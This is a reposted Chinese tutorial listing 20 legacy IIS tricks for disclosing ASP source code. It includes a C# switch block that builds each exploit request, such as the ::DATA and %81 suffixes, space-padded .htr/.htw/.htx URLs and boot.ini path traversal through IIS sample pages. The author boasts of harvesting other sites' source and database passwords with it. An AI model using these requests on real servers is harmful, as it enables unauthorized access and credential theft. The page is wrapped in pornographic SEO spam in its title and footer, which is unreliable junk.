日本国产亚洲-日本国产一区-日本国产一区二区三区-日本韩国欧美一区-日本韩国欧美在线-日本韩国欧美在线观看

當前位置:雨林木風下載站 > 技術開發教程 > 詳細頁面

20種看asp源碼的辦法及工具

20種看asp源碼的辦法及工具

更新時間:2022-05-01 文章作者:未知 信息來源:網絡 閱讀次數:

    眾所周知windows平臺漏洞百出,補丁一個接一個,但總是補也補不凈。我把我所知道的20種看asp源碼的方法總結了一下,并且用c#寫了個應用程序來掃描這些漏洞,發現雖然大部分的方法已經不起做用,但還是有一些漏網之魚的:),結果這兩天真看到不少站的源代碼,包括數據庫密碼,如果用access的可以把庫下載下來,而用sql server的如果不是用udl,dsn等來連接的話,也可以通過tcp/ip網絡庫連接到數據庫,為所欲為呀。先面把這20種方法列在下面:

.
%81
::DATA
%2e
%2e%41sp
+.htr
\\
longhtr
.bak
codebrws.asp
showcode.asp
null.htw
qfullhit.htw
qsumrhit.htw
query.idq
search/qfullhit.htw
search/qsumrhit.htw
iirturnh.htw
.htw
Translate:f


上邊這些漏洞前面10幾條是通過在asp文件后直接加上,如%81就是xxx.asp%81,后面這些都是通過iis自帶的例子或系統漏洞實現的,最特別的是那種translate:f方法,它直接通過瀏覽器是無法使用的,必須同服務器建立tcp/ip的socket連接,發送請求才行,具體每個漏洞如何使用,看下面,這是我那個應用程序的一部分,如果你要全部的可以到我的站點去下載。

                switch (this.cboMethod.SelectedIndex)
                {
                    case 0:          //直接讀取
                        strRequestFile = strServer + strUrl ;
                        break ;
                    case 5 :         //%2e%41sp
                        strRequestFile = strServer + strPath + strFirst
                                        + "%2e%41sp" ;
                        break ;
                    case 8 :        //longhtr
                        strRequestFile = strServer + strUrl
                             + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                             + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                             + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
                        break ;

                    case 10:     //codebrws.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + strUrl ;
                        break ;

                    case 11:    //showcode.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                                        + "/msadc/../../../../boot.ini" ;
                        break;

                    case 12 :  //null.htw
                        strRequestFile = strServer + "/null.htw?CiWebHitsFile="
                                        + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
                        break ;
                    case 13 :  //qfullhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 14 :  //qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 15 :  //query.idq
                        strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
                        break ;

                    case 16:   //search/qfullhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 17:   // search/qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;
                    
                    case 18:   //iirturnh.htw
                        strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full";
                        break ;

                    case 19:  //.htw
                        strRequestFile = strServer + strUrl
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                                        + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
                                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                                        + "&CiHiliteType=Full" ;
                        break ;

                    default:
                        strRequestFile = strServer + strUrl + this.cboMethod.Text ;
                }

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統下載排行

主站蜘蛛池模板: 99热一区 | 久久综合久久美利坚合众国 | 久久99久久精品国产只有 | 日本在线无| 欧美国产日韩精品 | 最近最好看的2018中文字幕国语 | 日本人 视频 - 18jizz | 九一在线观看 | 国产一区二区三区四区 | 成年人视频在线免费 | 国内精品免费一区二区三区 | 你的奶好大摸得我好爽 | 成人国产精品视频 | 免费日本视频 | 国产精品一区二区国产 | 在线欧美日韩 | 91久久香蕉国产线看观看软件 | 日本在线视频观看 | 欧美日韩一区二区视频免费看 | 免费人成在线观看网站视频 | 免费黄视频网站 | 亚洲国产欧美在线人成aaaa20 | 在线欧美亚洲 | 久草视频播放 | 99精品国产综合久久久久 | 综合一区自拍亚洲综合图区 | 最新亚洲精品国自产在线 | 女网址www女影院 | 青青久在线视频免费观看 | 久久精品视频在线观看榴莲视频 | 亚洲欧美日韩一区高清中文字幕 | 亚洲网址在线 | 国产精品糟蹋漂亮女教师 | 高清性色生活片久久久 | 亚洲日本欧美产综合在线 | 亚洲国产日产韩国欧美综合 | 成人看片黄a在线观看 | 久久99精品久久只有精品 | 日日射天天操 | 成人精品视频在线观看播放 | 鲁丝一区二区三区不属 |